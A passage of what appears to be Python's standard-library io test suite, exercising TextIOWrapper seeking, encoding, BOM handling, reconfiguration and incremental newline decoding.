multi_line_test(self, f, enc): f.seek(0) f.truncate() sample = "s\xff\u0fff\uffff" wlines = [] for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000): chars = [] for i in range(size): chars.append(sample[i % len(sample)]) line = "".join(chars) + "\n" wlines.append((f.tell(), line)) f.write(line) f.seek(0) rlines = [] while True: pos = f.tell() line = f.readline() if not line: break rlines.append((pos, line)) self.assertEqual(rlines, wlines) def test_telling(self): f = self.open(support.TESTFN, "w+", encoding="utf-8") p0 = f.tell() f.write("\xff\n") p1 = f.tell() f.write("\xff\n") p2 = f.tell() f.seek(0) self.assertEqual(f.tell(), p0) self.assertEqual(f.readline(), "\xff\n") self.assertEqual(f.tell(), p1) self.assertEqual(f.readline(), "\xff\n") self.assertEqual(f.tell(), p2) f.seek(0) for line in f: self.assertEqual(line, "\xff\n") self.assertRaises(OSError, f.tell) self.assertEqual(f.tell(), p2) f.close() def test_seeking(self): chunk_size = _default_chunk_size() prefix_size = chunk_size - 2 u_prefix = "a" * prefix_size prefix = bytes(u_prefix.encode("utf-8")) self.assertEqual(len(u_prefix), len(prefix)) u_suffix = "\u8888\n" suffix = bytes(u_suffix.encode("utf-8")) line = prefix + suffix with self.open(support.TESTFN, "wb") as f: f.write(line*2) with self.open(support.TESTFN, "r", encoding="utf-8") as f: s = f.read(prefix_size) self.assertEqual(s, str(prefix, "ascii")) self.assertEqual(f.tell(), prefix_size) self.assertEqual(f.readline(), u_suffix) def test_seeking_too(self): # Regression test for a specific bug data = b'\xe0\xbf\xbf\n' with self.open(support.TESTFN, "wb") as f: f.write(data) with self.open(support.TESTFN, "r", encoding="utf-8") as f: f._CHUNK_SIZE # Just test that it exists f._CHUNK_SIZE = 2 f.readline() f.tell() def test_seek_and_tell(self): #Test seek/tell using the StatefulIncrementalDecoder. 
# Make test faster by doing smaller seeks CHUNK_SIZE = 128 def test_seek_and_tell_with_data(data, min_pos=0): """Tell/seek to various points within a data stream and ensure that the decoded data returned by read() is consistent.""" f = self.open(support.TESTFN, 'wb') f.write(data) f.close() f = self.open(support.TESTFN, encoding='test_decoder') f._CHUNK_SIZE = CHUNK_SIZE decoded = f.read() f.close() for i in range(min_pos, len(decoded) + 1): # seek positions for j in [1, 5, len(decoded) - i]: # read lengths f = self.open(support.TESTFN, encoding='test_decoder') self.assertEqual(f.read(i), decoded[:i]) cookie = f.tell() self.assertEqual(f.read(j), decoded[i:i + j]) f.seek(cookie) self.assertEqual(f.read(), decoded[i:]) f.close() # Enable the test decoder. StatefulIncrementalDecoder.codecEnabled = 1 # Run the tests. try: # Try each test case. for input, _, _ in StatefulIncrementalDecoderTest.test_cases: test_seek_and_tell_with_data(input) # Position each test case so that it crosses a chunk boundary. for input, _, _ in StatefulIncrementalDecoderTest.test_cases: offset = CHUNK_SIZE - len(input)//2 prefix = b'.'*offset # Don't bother seeking into the prefix (takes too long). min_pos = offset*2 test_seek_and_tell_with_data(prefix + input, min_pos) # Ensure our test decoder won't interfere with subsequent tests. 
finally: StatefulIncrementalDecoder.codecEnabled = 0 def test_multibyte_seek_and_tell(self): f = self.open(support.TESTFN, "w", encoding="euc_jp") f.write("AB\n\u3046\u3048\n") f.close() f = self.open(support.TESTFN, "r", encoding="euc_jp") self.assertEqual(f.readline(), "AB\n") p0 = f.tell() self.assertEqual(f.readline(), "\u3046\u3048\n") p1 = f.tell() f.seek(p0) self.assertEqual(f.readline(), "\u3046\u3048\n") self.assertEqual(f.tell(), p1) f.close() def test_seek_with_encoder_state(self): f = self.open(support.TESTFN, "w", encoding="euc_jis_2004") f.write("\u00e6\u0300") p0 = f.tell() f.write("\u00e6") f.seek(p0) f.write("\u0300") f.close() f = self.open(support.TESTFN, "r", encoding="euc_jis_2004") self.assertEqual(f.readline(), "\u00e6\u0300\u0300") f.close() def test_encoded_writes(self): data = "1234567890" tests = ("utf-16", "utf-16-le", "utf-16-be", "utf-32", "utf-32-le", "utf-32-be") for encoding in tests: buf = self.BytesIO() f = self.TextIOWrapper(buf, encoding=encoding) # Check if the BOM is written only once (see issue1753). f.write(data) f.write(data) f.seek(0) self.assertEqual(f.read(), data * 2) f.seek(0) self.assertEqual(f.read(), data * 2) self.assertEqual(buf.getvalue(), (data * 2).encode(encoding)) def test_unreadable(self): class UnReadable(self.BytesIO): def readable(self): return False txt = self.TextIOWrapper(UnReadable()) self.assertRaises(OSError, txt.read) def test_read_one_by_one(self): txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB")) reads = "" while True: c = txt.read(1) if not c: break reads += c self.assertEqual(reads, "AA\nBB") def test_readlines(self): txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC")) self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"]) txt.seek(0) self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"]) txt.seek(0) self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"]) # read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128. 
def test_read_by_chunk(self): # make sure "\r\n" straddles 128 char boundary. txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB")) reads = "" while True: c = txt.read(128) if not c: break reads += c self.assertEqual(reads, "A"*127+"\nB") def test_writelines(self): l = ['ab', 'cd', 'ef'] buf = self.BytesIO() txt = self.TextIOWrapper(buf) txt.writelines(l) txt.flush() self.assertEqual(buf.getvalue(), b'abcdef') def test_writelines_userlist(self): l = UserList(['ab', 'cd', 'ef']) buf = self.BytesIO() txt = self.TextIOWrapper(buf) txt.writelines(l) txt.flush() self.assertEqual(buf.getvalue(), b'abcdef') def test_writelines_error(self): txt = self.TextIOWrapper(self.BytesIO()) self.assertRaises(TypeError, txt.writelines, [1, 2, 3]) self.assertRaises(TypeError, txt.writelines, None) self.assertRaises(TypeError, txt.writelines, b'abc') def test_issue1395_1(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") # read one char at a time reads = "" while True: c = txt.read(1) if not c: break reads += c self.assertEqual(reads, self.normalized) def test_issue1395_2(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = "" while True: c = txt.read(4) if not c: break reads += c self.assertEqual(reads, self.normalized) def test_issue1395_3(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = txt.read(4) reads += txt.read(4) reads += txt.readline() reads += txt.readline() reads += txt.readline() self.assertEqual(reads, self.normalized) def test_issue1395_4(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = txt.read(4) reads += txt.read() self.assertEqual(reads, self.normalized) def test_issue1395_5(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = txt.read(4) pos = txt.tell() txt.seek(0) txt.seek(pos) self.assertEqual(txt.read(4), 
"BBB\n") def test_issue2282(self): buffer = self.BytesIO(self.testdata) txt = self.TextIOWrapper(buffer, encoding="ascii") self.assertEqual(buffer.seekable(), txt.seekable()) def test_append_bom(self): # The BOM is not written again when appending to a non-empty file filename = support.TESTFN for charset in ('utf-8-sig', 'utf-16', 'utf-32'): with self.open(filename, 'w', encoding=charset) as f: f.write('aaa') pos = f.tell() with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'aaa'.encode(charset)) with self.open(filename, 'a', encoding=charset) as f: f.write('xxx') with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'aaaxxx'.encode(charset)) def test_seek_bom(self): # Same test, but when seeking manually filename = support.TESTFN for charset in ('utf-8-sig', 'utf-16', 'utf-32'): with self.open(filename, 'w', encoding=charset) as f: f.write('aaa') pos = f.tell() with self.open(filename, 'r+', encoding=charset) as f: f.seek(pos) f.write('zzz') f.seek(0) f.write('bbb') with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'bbbzzz'.encode(charset)) def test_seek_append_bom(self): # Same test, but first seek to the start and then to the end filename = support.TESTFN for charset in ('utf-8-sig', 'utf-16', 'utf-32'): with self.open(filename, 'w', encoding=charset) as f: f.write('aaa') with self.open(filename, 'a', encoding=charset) as f: f.seek(0) f.seek(0, self.SEEK_END) f.write('xxx') with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'aaaxxx'.encode(charset)) def test_errors_property(self): with self.open(support.TESTFN, "w") as f: self.assertEqual(f.errors, "strict") with self.open(support.TESTFN, "w", errors="replace") as f: self.assertEqual(f.errors, "replace") @support.no_tracing def test_threads_write(self): # Issue6750: concurrent writes could duplicate data event = threading.Event() with self.open(support.TESTFN, "w", buffering=1) as f: def run(n): text = "Thread%03d\n" % n event.wait() f.write(text) threads = 
[threading.Thread(target=run, args=(x,)) for x in range(20)] with support.start_threads(threads, event.set): time.sleep(0.02) with self.open(support.TESTFN) as f: content = f.read() for n in range(20): self.assertEqual(content.count("Thread%03d\n" % n), 1) def test_flush_error_on_close(self): # Test that text file is closed despite failed flush # and that flush() is called before file closed. txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") closed = [] def bad_flush(): closed[:] = [txt.closed, txt.buffer.closed] raise OSError() txt.flush = bad_flush self.assertRaises(OSError, txt.close) # exception not swallowed self.assertTrue(txt.closed) self.assertTrue(txt.buffer.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed self.assertFalse(closed[1]) txt.flush = lambda: None # break reference loop def test_close_error_on_close(self): buffer = self.BytesIO(self.testdata) def bad_flush(): raise OSError('flush') def bad_close(): raise OSError('close') buffer.close = bad_close txt = self.TextIOWrapper(buffer, encoding="ascii") txt.flush = bad_flush with self.assertRaises(OSError) as err: # exception not swallowed txt.close() self.assertEqual(err.exception.args, ('close',)) self.assertIsInstance(err.exception.__context__, OSError) self.assertEqual(err.exception.__context__.args, ('flush',)) self.assertFalse(txt.closed) # Silence destructor error buffer.close = lambda: None txt.flush = lambda: None def test_nonnormalized_close_error_on_close(self): # Issue #21677 buffer = self.BytesIO(self.testdata) def bad_flush(): raise non_existing_flush def bad_close(): raise non_existing_close buffer.close = bad_close txt = self.TextIOWrapper(buffer, encoding="ascii") txt.flush = bad_flush with self.assertRaises(NameError) as err: # exception not swallowed txt.close() self.assertIn('non_existing_close', str(err.exception)) self.assertIsInstance(err.exception.__context__, NameError) 
self.assertIn('non_existing_flush', str(err.exception.__context__)) self.assertFalse(txt.closed) # Silence destructor error buffer.close = lambda: None txt.flush = lambda: None def test_multi_close(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt.close() txt.close() txt.close() self.assertRaises(ValueError, txt.flush) def test_unseekable(self): txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata)) self.assertRaises(self.UnsupportedOperation, txt.tell) self.assertRaises(self.UnsupportedOperation, txt.seek, 0) def test_readonly_attributes(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") buf = self.BytesIO(self.testdata) with self.assertRaises(AttributeError): txt.buffer = buf def test_rawio(self): # Issue #12591: TextIOWrapper must work with raw I/O objects, so # that subprocess.Popen() can have the required unbuffered # semantics with universal_newlines=True. raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n']) txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') # Reads self.assertEqual(txt.read(4), 'abcd') self.assertEqual(txt.readline(), 'efghi\n') self.assertEqual(list(txt), ['jkl\n', 'opq\n']) def test_rawio_write_through(self): # Issue #12591: with write_through=True, writes don't need a flush raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n']) txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n', write_through=True) txt.write('1') txt.write('23\n4') txt.write('5') self.assertEqual(b''.join(raw._write_stack), b'123\n45') def test_bufio_write_through(self): # Issue #21396: write_through=True doesn't force a flush() # on the underlying binary buffered object. 
flush_called, write_called = [], [] class BufferedWriter(self.BufferedWriter): def flush(self, *args, **kwargs): flush_called.append(True) return super().flush(*args, **kwargs) def write(self, *args, **kwargs): write_called.append(True) return super().write(*args, **kwargs) rawio = self.BytesIO() data = b"a" bufio = BufferedWriter(rawio, len(data)*2) textio = self.TextIOWrapper(bufio, encoding='ascii', write_through=True) # write to the buffered io but don't overflow the buffer text = data.decode('ascii') textio.write(text) # buffer.flush is not called with write_through=True self.assertFalse(flush_called) # buffer.write *is* called with write_through=True self.assertTrue(write_called) self.assertEqual(rawio.getvalue(), b"") # no flush write_called = [] # reset textio.write(text * 10) # total content is larger than bufio buffer self.assertTrue(write_called) self.assertEqual(rawio.getvalue(), data * 11) # all flushed def test_reconfigure_write_through(self): raw = self.MockRawIO([]) t = self.TextIOWrapper(raw, encoding='ascii', newline='\n') t.write('1') t.reconfigure(write_through=True) # implied flush self.assertEqual(t.write_through, True) self.assertEqual(b''.join(raw._write_stack), b'1') t.write('23') self.assertEqual(b''.join(raw._write_stack), b'123') t.reconfigure(write_through=False) self.assertEqual(t.write_through, False) t.write('45') t.flush() self.assertEqual(b''.join(raw._write_stack), b'12345') # Keeping default value t.reconfigure() t.reconfigure(write_through=None) self.assertEqual(t.write_through, False) t.reconfigure(write_through=True) t.reconfigure() t.reconfigure(write_through=None) self.assertEqual(t.write_through, True) def test_read_nonbytes(self): # Issue #17106 # Crash when underlying read() returns non-bytes t = self.TextIOWrapper(self.StringIO('a')) self.assertRaises(TypeError, t.read, 1) t = self.TextIOWrapper(self.StringIO('a')) self.assertRaises(TypeError, t.readline) t = self.TextIOWrapper(self.StringIO('a')) 
self.assertRaises(TypeError, t.read) def test_illegal_encoder(self): # Issue 31271: Calling write() while the return value of encoder's # encode() is invalid shouldn't cause an assertion failure. rot13 = codecs.lookup("rot13") with support.swap_attr(rot13, '_is_text_encoding', True): t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13") self.assertRaises(TypeError, t.write, 'bar') def test_illegal_decoder(self): # Issue #17106 # Bypass the early encoding check added in issue 20404 def _make_illegal_wrapper(): quopri = codecs.lookup("quopri") quopri._is_text_encoding = True try: t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n', encoding="quopri") finally: quopri._is_text_encoding = False return t # Crash when decoder returns non-string t = _make_illegal_wrapper() self.assertRaises(TypeError, t.read, 1) t = _make_illegal_wrapper() self.assertRaises(TypeError, t.readline) t = _make_illegal_wrapper() self.assertRaises(TypeError, t.read) # Issue 31243: calling read() while the return value of decoder's # getstate() is invalid should neither crash the interpreter nor # raise a SystemError. def _make_very_illegal_wrapper(getstate_ret_val): class BadDecoder: def getstate(self): return getstate_ret_val def _get_bad_decoder(dummy): return BadDecoder() quopri = codecs.lookup("quopri") with support.swap_attr(quopri, 'incrementaldecoder', _get_bad_decoder): return _make_illegal_wrapper() t = _make_very_illegal_wrapper(42) self.assertRaises(TypeError, t.read, 42) t = _make_very_illegal_wrapper(()) self.assertRaises(TypeError, t.read, 42) t = _make_very_illegal_wrapper((1, 2)) self.assertRaises(TypeError, t.read, 42) def _check_create_at_shutdown(self, **kwargs): # Issue #20037: creating a TextIOWrapper at shutdown # shouldn't crash the interpreter. 
iomod = self.io.__name__ code = """if 1: import codecs import {iomod} as io # Avoid looking up codecs at shutdown codecs.lookup('utf-8') class C: def __init__(self): self.buf = io.BytesIO() def __del__(self): io.TextIOWrapper(self.buf, **{kwargs}) print("ok") c = C() """.format(iomod=iomod, kwargs=kwargs) return assert_python_ok("-c", code) def test_create_at_shutdown_without_encoding(self): rc, out, err = self._check_create_at_shutdown() if err: # Can error out with a RuntimeError if the module state # isn't found. self.assertIn(self.shutdown_error, err.decode()) else: self.assertEqual("ok", out.decode().strip()) def test_create_at_shutdown_with_encoding(self): rc, out, err = self._check_create_at_shutdown(encoding='utf-8', errors='strict') self.assertFalse(err) self.assertEqual("ok", out.decode().strip()) def test_read_byteslike(self): r = MemviewBytesIO(b'Just some random string\n') t = self.TextIOWrapper(r, 'utf-8') # TextIOwrapper will not read the full string, because # we truncate it to a multiple of the native int size # so that we can construct a more complex memoryview. 
bytes_val = _to_memoryview(r.getvalue()).tobytes() self.assertEqual(t.read(200), bytes_val.decode('utf-8')) def test_issue22849(self): class F(object): def readable(self): return True def writable(self): return True def seekable(self): return True for i in range(10): try: self.TextIOWrapper(F(), encoding='utf-8') except Exception: pass F.tell = lambda x: 0 t = self.TextIOWrapper(F(), encoding='utf-8') def test_reconfigure_encoding_read(self): # latin1 -> utf8 # (latin1 can decode utf-8 encoded string) data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8') raw = self.BytesIO(data) txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n') self.assertEqual(txt.readline(), 'abc\xe9\n') with self.assertRaises(self.UnsupportedOperation): txt.reconfigure(encoding='utf-8') with self.assertRaises(self.UnsupportedOperation): txt.reconfigure(newline=None) def test_reconfigure_write_fromascii(self): # ascii has a specific encodefunc in the C implementation, # but utf-8-sig has not. Make sure that we get rid of the # cached encodefunc when we switch encoders. 
raw = self.BytesIO() txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') txt.write('foo\n') txt.reconfigure(encoding='utf-8-sig') txt.write('\xe9\n') txt.flush() self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n') def test_reconfigure_write(self): # latin -> utf8 raw = self.BytesIO() txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n') txt.write('abc\xe9\n') txt.reconfigure(encoding='utf-8') self.assertEqual(raw.getvalue(), b'abc\xe9\n') txt.write('d\xe9f\n') txt.flush() self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n') # ascii -> utf-8-sig: ensure that no BOM is written in the middle of # the file raw = self.BytesIO() txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') txt.write('abc\n') txt.reconfigure(encoding='utf-8-sig') txt.write('d\xe9f\n') txt.flush() self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n') def test_reconfigure_write_non_seekable(self): raw = self.BytesIO() raw.seekable = lambda: False raw.seek = None txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') txt.write('abc\n') txt.reconfigure(encoding='utf-8-sig') txt.write('d\xe9f\n') txt.flush() # If the raw stream is not seekable, there'll be a BOM self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n') def test_reconfigure_defaults(self): txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n') txt.reconfigure(encoding=None) self.assertEqual(txt.encoding, 'ascii') self.assertEqual(txt.errors, 'replace') txt.write('LF\n') txt.reconfigure(newline='\r\n') self.assertEqual(txt.encoding, 'ascii') self.assertEqual(txt.errors, 'replace') txt.reconfigure(errors='ignore') self.assertEqual(txt.encoding, 'ascii') self.assertEqual(txt.errors, 'ignore') txt.write('CRLF\n') txt.reconfigure(encoding='utf-8', newline=None) self.assertEqual(txt.errors, 'strict') txt.seek(0) self.assertEqual(txt.read(), 'LF\nCRLF\n') self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n') def test_reconfigure_newline(self): raw = self.BytesIO(b'CR\rEOF') 
txt = self.TextIOWrapper(raw, 'ascii', newline='\n') txt.reconfigure(newline=None) self.assertEqual(txt.readline(), 'CR\n') raw = self.BytesIO(b'CR\rEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\n') txt.reconfigure(newline='') self.assertEqual(txt.readline(), 'CR\r') raw = self.BytesIO(b'CR\rLF\nEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\r') txt.reconfigure(newline='\n') self.assertEqual(txt.readline(), 'CR\rLF\n') raw = self.BytesIO(b'LF\nCR\rEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\n') txt.reconfigure(newline='\r') self.assertEqual(txt.readline(), 'LF\nCR\r') raw = self.BytesIO(b'CR\rCRLF\r\nEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\r') txt.reconfigure(newline='\r\n') self.assertEqual(txt.readline(), 'CR\rCRLF\r\n') txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r') txt.reconfigure(newline=None) txt.write('linesep\n') txt.reconfigure(newline='') txt.write('LF\n') txt.reconfigure(newline='\n') txt.write('LF\n') txt.reconfigure(newline='\r') txt.write('CR\n') txt.reconfigure(newline='\r\n') txt.write('CRLF\n') expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n' self.assertEqual(txt.detach().getvalue().decode('ascii'), expected) def test_issue25862(self): # Assertion failures occurred in tell() after read() and write(). 
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii') t.read(1) t.read() t.tell() t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii') t.read(1) t.write('x') t.tell() class MemviewBytesIO(io.BytesIO): '''A BytesIO object whose read method returns memoryviews rather than bytes''' def read1(self, len_): return _to_memoryview(super().read1(len_)) def read(self, len_): return _to_memoryview(super().read(len_)) def _to_memoryview(buf): '''Convert bytes-object *buf* to a non-trivial memoryview''' arr = array.array('i') idx = len(buf) - len(buf) % arr.itemsize arr.frombytes(buf[:idx]) return memoryview(arr) class CTextIOWrapperTest(TextIOWrapperTest): io = io shutdown_error = "LookupError: unknown encoding: ascii" def test_initialization(self): r = self.BytesIO(b"\xc3\xa9\n\n") b = self.BufferedReader(r, 1000) t = self.TextIOWrapper(b) self.assertRaises(ValueError, t.__init__, b, newline='xyzzy') self.assertRaises(ValueError, t.read) t = self.TextIOWrapper.__new__(self.TextIOWrapper) self.assertRaises(Exception, repr, t) def test_garbage_collection(self): # C TextIOWrapper objects are collected, and collecting them flushes # all data to disk. # The Python version has __del__, so it ends in gc.garbage instead. with support.check_warnings(('', ResourceWarning)): rawio = io.FileIO(support.TESTFN, "wb") b = self.BufferedWriter(rawio) t = self.TextIOWrapper(b, encoding="ascii") t.write("456def") t.x = t wr = weakref.ref(t) del t support.gc_collect() self.assertIsNone(wr(), wr) with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"456def") def test_rwpair_cleared_before_textio(self): # Issue 13070: TextIOWrapper's finalization would crash when called # after the reference to the underlying BufferedRWPair's writer got # cleared by the GC. 
for i in range(1000): b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()) t1 = self.TextIOWrapper(b1, encoding="ascii") b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()) t2 = self.TextIOWrapper(b2, encoding="ascii") # circular references t1.buddy = t2 t2.buddy = t1 support.gc_collect() def test_del__CHUNK_SIZE_SystemError(self): t = self.TextIOWrapper(self.BytesIO(), encoding='ascii') with self.assertRaises(AttributeError): del t._CHUNK_SIZE def test_internal_buffer_size(self): # bpo-43260: TextIOWrapper's internal buffer should not store # data larger than chunk size. chunk_size = 8192 # default chunk size, updated later class MockIO(self.MockRawIO): def write(self, data): if len(data) > chunk_size: raise RuntimeError return super().write(data) buf = MockIO() t = self.TextIOWrapper(buf, encoding="ascii") chunk_size = t._CHUNK_SIZE t.write("abc") t.write("def") # default chunk size is 8192 bytes so t don't write data to buf. self.assertEqual([], buf._write_stack) with self.assertRaises(RuntimeError): t.write("x"*(chunk_size+1)) self.assertEqual([b"abcdef"], buf._write_stack) t.write("ghi") t.write("x"*chunk_size) self.assertEqual([b"abcdef", b"ghi", b"x"*chunk_size], buf._write_stack) class PyTextIOWrapperTest(TextIOWrapperTest): io = pyio shutdown_error = "LookupError: unknown encoding: ascii" class IncrementalNewlineDecoderTest(unittest.TestCase): def check_newline_decoding_utf8(self, decoder): # UTF-8 specific tests for a newline decoder def _check_decode(b, s, **kwargs): # We exercise getstate() / setstate() as well as decode() state = decoder.getstate() self.assertEqual(decoder.decode(b, **kwargs), s) decoder.setstate(state) self.assertEqual(decoder.decode(b, **kwargs), s) _check_decode(b'\xe8\xa2\x88', "\u8888") _check_decode(b'\xe8', "") _check_decode(b'\xa2', "") _check_decode(b'\x88', "\u8888") _check_decode(b'\xe8', "") _check_decode(b'\xa2', "") _check_decode(b'\x88', "\u8888") _check_decode(b'\xe8', "") 
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True) decoder.reset() _check_decode(b'\n', "\n") _check_decode(b'\r', "") _check_decode(b'', "\n", final=True) _check_decode(b'\r', "\n", final=True) _check_decode(b'\r', "") _check_decode(b'a', "\na") _check_decode(b'\r\r\n', "\n\n") _check_decode(b'\r', "") _check_decode(b'\r', "\n") _check_decode(b'\na', "\na") _check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n") _check_decode(b'\xe8\xa2\x88', "\u8888") _check_decode(b'\n', "\n") _check_decode(b'\xe8\xa2\x88\r', "\u8888") _check_decode(b'\n', "\n") def check_newline_decoding(self, decoder, encoding): result = [] if encoding is not None: encoder = codecs.getincrementalencoder(encoding)() def _decode_bytewise(s): # Decode one byte at a time for b in encoder.encode(s): result.append(decoder.decode(bytes([b]))) else: encoder = None def _decode_bytewise(s): # Decode one char at a time for c in s: result.append(decoder.decode(c)) self.assertEqual(decoder.newlines, None) _decode_bytewise("abc\n\r") self.assertEqual(decoder.newlines, '\n') _decode_bytewise("\nabc") self.assertEqual(decoder.newlines, ('\n', '\r\n')) _decode_bytewise("abc\r") self.assertEqual(decoder.newlines, ('\n', '\r\n')) _decode_bytewise("abc") self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n')) _decode_bytewise("abc\r") self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc") decoder.reset() input = "abc" if encoder is not None: encoder.reset() input = encoder.encode(input) self.assertEqual(decoder.decode(input), "abc") self.assertEqual(decoder.newlines, None) def test_newline_decoder(self): encodings = ( # None meaning the IncrementalNewlineDecoder takes unicode input # rather than bytes input None, 'utf-8', 'latin-1', 'utf-16', 'utf-16-le', 'utf-16-be', 'utf-32', 'utf-32-le', 'utf-32-be', ) for enc in encodings: decoder = enc and codecs.getincrementaldecoder(enc)() decoder = self.IncrementalNewlineDecoder(decoder, translate=True) self.check_newline_decoding(decoder, enc) decoder = 
codecs.getincrementaldecoder("utf-8")() decoder = self.IncrementalNewlineDecoder(decoder, translate=True) self.check_newline_decoding_utf8(decoder) self.assertRaises(TypeError, decoder.setstate, 42) def test_newline_bytes(self): # Issue 5433: Excessive optimization in IncrementalNewlineDecoder def _check(dec): self.assertEqual(dec.newlines, None) self.assertEqual(dec.decode("\u0D00"), "\u0D00") self.assertEqual(dec.newlines, None) self.assertEqual(dec.decode("\u0A00"), "\u0A00") self.assertEqual(dec.newlines, None) dec = self.IncrementalNewlineDecoder(None, translate=False) _check(dec) dec = self.IncrementalNewlineDecoder(None, translate=True) _check(dec) def test_translate(self): # issue 35062 for translate in (-2, -1, 1, 2): decoder = codecs.getincrementaldecoder("utf-8")() decoder = self.IncrementalNewlineDecoder(decoder, translate) self.check_newline_decoding_utf8(decoder) decoder = codecs.getincrementaldecoder("utf-8")() decoder = self.IncrementalNewlineDecoder(decoder, translate=0) self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n") class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest): pass class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest): pass # XXX Tests for open() class MiscIOTest(unittest.TestCase): def tearDown(self): support.unlink(support.TESTFN) def test___all__(self): for name in self.io.__all__: obj = getattr(self.io, name, None) self.assertIsNotNone(obj, name) if name in ("open", "open_code"): continue elif "error" in name.lower() or name == "UnsupportedOperation": self.assertTrue(issubclass(obj, Exception), name) elif not name.startswith("SEEK_"): self.assertTrue(issubclass(obj, self.IOBase)) def test_attributes(self): f = self.open(support.TESTFN, "wb", buffering=0) self.assertEqual(f.mode, "wb") f.close() with support.check_warnings(('', DeprecationWarning)): f = self.open(support.TESTFN, "U") self.assertEqual(f.name, support.TESTFN) self.assertEqual(f.buffer.name, support.TESTFN) 
self.assertEqual(f.buffer.raw.name, support.TESTFN) self.assertEqual(f.mode, "U") self.assertEqual(f.buffer.mode, "rb") self.assertEqual(f.buffer.raw.mode, "rb") f.close() f = self.open(support.TESTFN, "w+") self.assertEqual(f.mode, "w+") self.assertEqual(f.buffer.mode, "rb+") # Does it really matter? self.assertEqual(f.buffer.raw.mode, "rb+") g = self.open(f.fileno(), "wb", closefd=False) self.assertEqual(g.mode, "wb") self.assertEqual(g.raw.mode, "wb") self.assertEqual(g.name, f.fileno()) self.assertEqual(g.raw.name, f.fileno()) f.close() g.close() def test_open_pipe_with_append(self): # bpo-27805: Ignore ESPIPE from lseek() in open(). r, w = os.pipe() self.addCleanup(os.close, r) f = self.open(w, 'a') self.addCleanup(f.close) # Check that the file is marked non-seekable. On Windows, however, lseek # somehow succeeds on pipes. if sys.platform != 'win32': self.assertFalse(f.seekable()) def test_io_after_close(self): for kwargs in [ {"mode": "w"}, {"mode": "wb"}, {"mode": "w", "buffering": 1}, {"mode": "w", "buffering": 2}, {"mode": "wb", "buffering": 0}, {"mode": "r"}, {"mode": "rb"}, {"mode": "r", "buffering": 1}, {"mode": "r", "buffering": 2}, {"mode": "rb", "buffering": 0}, {"mode": "w+"}, {"mode": "w+b"}, {"mode": "w+", "buffering": 1}, {"mode": "w+", "buffering": 2}, {"mode": "w+b", "buffering": 0}, ]: f = self.open(support.TESTFN, **kwargs) f.close() self.assertRaises(ValueError, f.flush) self.assertRaises(ValueError, f.fileno) self.assertRaises(ValueError, f.isatty) self.assertRaises(ValueError, f.__iter__) if hasattr(f, "peek"): self.assertRaises(ValueError, f.peek, 1) self.assertRaises(ValueError, f.read) if hasattr(f, "read1"): self.assertRaises(ValueError, f.read1, 1024) self.assertRaises(ValueError, f.read1) if hasattr(f, "readall"): self.assertRaises(ValueError, f.readall) if hasattr(f, "readinto"): self.assertRaises(ValueError, f.readinto, bytearray(1024)) if hasattr(f, "readinto1"): self.assertRaises(ValueError, f.readinto1, 